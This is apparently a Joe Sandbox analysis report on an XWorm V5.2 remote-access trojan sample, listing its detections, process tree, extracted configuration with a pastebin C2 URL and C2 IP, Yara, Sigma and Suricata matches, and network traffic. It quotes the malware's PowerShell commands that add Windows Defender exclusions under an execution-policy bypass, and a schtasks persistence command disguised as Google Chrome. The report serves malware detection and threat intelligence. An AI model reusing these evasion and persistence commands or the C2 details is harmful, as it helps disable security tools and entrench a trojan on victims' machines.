Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ra66DSpa.exe

Overview

General Information

Sample name:ra66DSpa.exe
Analysis ID:1525343
MD5:12ac7eecca99175c8953b8368d96440e
SHA1:aa6fcf14c66644111d1160a6dd4cdb67c58e709a
SHA256:9d7a88aa72820977134b39b0ae1907fd738de184b89ce72fbb77cee530a10e49
Tags:exexworm
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • ra66DSpa.exe (PID: 4540 cmdline: "C:\Users\user\Desktop\ra66DSpa.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
    • powershell.exe (PID: 2308 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ra66DSpa.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1948 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7060 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Google Chrome.exe (PID: 1456 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 6992 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • Google Chrome.exe (PID: 1756 cmdline: "C:\Users\user\AppData\Local\Google Chrome.exe" MD5: 12AC7EECCA99175C8953B8368D96440E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": "https://pastebin.com/raw/hhG5zGXd", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ra66DSpa.exeJoeSecurity_XWormYara detected XWormJoe Security
    ra66DSpa.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x10427:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Google Chrome.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Google Chrome.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x10427:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x10e1f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x10ebc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x10fd1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x10227:$cnc4: POST / HTTP/1.1
        Process Memory Space: ra66DSpa.exe PID: 4540JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.ra66DSpa.exe.6b0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.ra66DSpa.exe.6b0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x1101f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x110bc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x111d1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x10427:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Google Chrome.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ra66DSpa.exe, ProcessId: 4540, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google Chrome
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\user\AppData\Local\Google Chrome.exe", ProcessId: 7060, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ra66DSpa.exe", ParentImage: C:\Users\user\Desktop\ra66DSpa.exe, ParentProcessId: 4540, ParentProcessName: ra66DSpa.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ra66DSpa.exe', ProcessId: 2308, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-04T01:48:03.617687+020028559241Malware Command and Control Activity Detected192.168.2.653844147.185.221.2142956TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: ra66DSpa.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Google Chrome.exeAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: ra66DSpa.exeMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/hhG5zGXd", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Google Chrome.exeReversingLabs: Detection: 68%
            Multi AV Scanner detection for submitted file
            Source: ra66DSpa.exeReversingLabs: Detection: 68%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Google Chrome.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: ra66DSpa.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: ra66DSpa.exeString decryptor: https://pastebin.com/raw/hhG5zGXd
            Source: ra66DSpa.exeString decryptor: <123456789>
            Source: ra66DSpa.exeString decryptor: <Xwormmm>
            Source: ra66DSpa.exeString decryptor: XWorm V5.2
            Source: ra66DSpa.exeString decryptor: USB.exe
            Source: ra66DSpa.exeString decryptor: %LocalAppData%
            Source: ra66DSpa.exeString decryptor: Google Chrome.exe
            Source: ra66DSpa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:53843 version: TLS 1.2
            Source: ra66DSpa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:53844 -> 147.185.221.21:42956
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://pastebin.com/raw/hhG5zGXd
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: pastebin.com
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 147.185.221.21 ports 42956,2,4,5,6,9
            Source: global trafficTCP traffic: 192.168.2.6:53844 -> 147.185.221.21:42956
            Source: global trafficHTTP traffic detected: GET /raw/hhG5zGXd HTTP/1.1Host: pastebin.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 147.185.221.21 147.185.221.21
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /raw/hhG5zGXd HTTP/1.1Host: pastebin.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: global trafficDNS traffic detected: DNS query: stay-brook.gl.at.ply.gg
            Source: powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
            Source: powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
            Source: powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000005.00000002.2283007874.000001B4F371A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
            Source: Google Chrome.exe, 00000013.00000002.2890393554.0000000003051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/hhG5zGXd
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53843
            Source: unknownNetwork traffic detected: HTTP traffic on port 53843 -> 443
            Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.6:53843 version: TLS 1.2

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\ra66DSpa.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: ra66DSpa.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348AACA50_2_00007FFD348AACA5
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A99B20_2_00007FFD348A99B2
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A8C060_2_00007FFD348A8C06
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A69550_2_00007FFD348A6955
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A1DCA0_2_00007FFD348A1DCA
            Source: C:\Users\user\Desktop\ra66DSpa.exeCode function: 0_2_00007FFD348A0EFA0_2_00007FFD348A0EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489947D2_2_00007FFD3489947D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34898E2C2_2_00007FFD34898E2C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3489BC4A2_2_00007FFD3489BC4A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD349630E92_2_00007FFD349630E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A5CFA5_2_00007FFD348A5CFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A34FA5_2_00007FFD348A34FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348AACF25_2_00007FFD348AACF2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A347D5_2_00007FFD348A347D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A89F25_2_00007FFD348A89F2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348A25FD5_2_00007FFD348A25FD
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34972E115_2_00007FFD34972E11
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348A8E258_2_00007FFD348A8E25
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD349773428_2_00007FFD34977342
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348A957410_2_00007FFD348A9574
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD348A8EFA10_2_00007FFD348A8EFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD34972E1110_2_00007FFD34972E11
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 16_2_00007FFD348B0EFA16_2_00007FFD348B0EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 16_2_00007FFD348B1DCA16_2_00007FFD348B1DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 17_2_00007FFD34890EFA17_2_00007FFD34890EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 17_2_00007FFD34891DCA17_2_00007FFD34891DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 18_2_00007FFD348B0EFA18_2_00007FFD348B0EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 18_2_00007FFD348B1DCA18_2_00007FFD348B1DCA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 19_2_00007FFD34890EFA19_2_00007FFD34890EFA
            Source: C:\Users\user\AppData\Local\Google Chrome.exeCode function: 19_2_00007FFD34891DCA19_2_00007FFD34891DCA
            Source: ra66DSpa.exe, 00000000.00000000.2096237642.00000000006C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exeP vs ra66DSpa.exe
            Source: ra66DSpa.exeBinary or memory string: OriginalFilenameXClient.exeP vs ra66DSpa.exe
            Source: ra66DSpa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: ra66DSpa.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
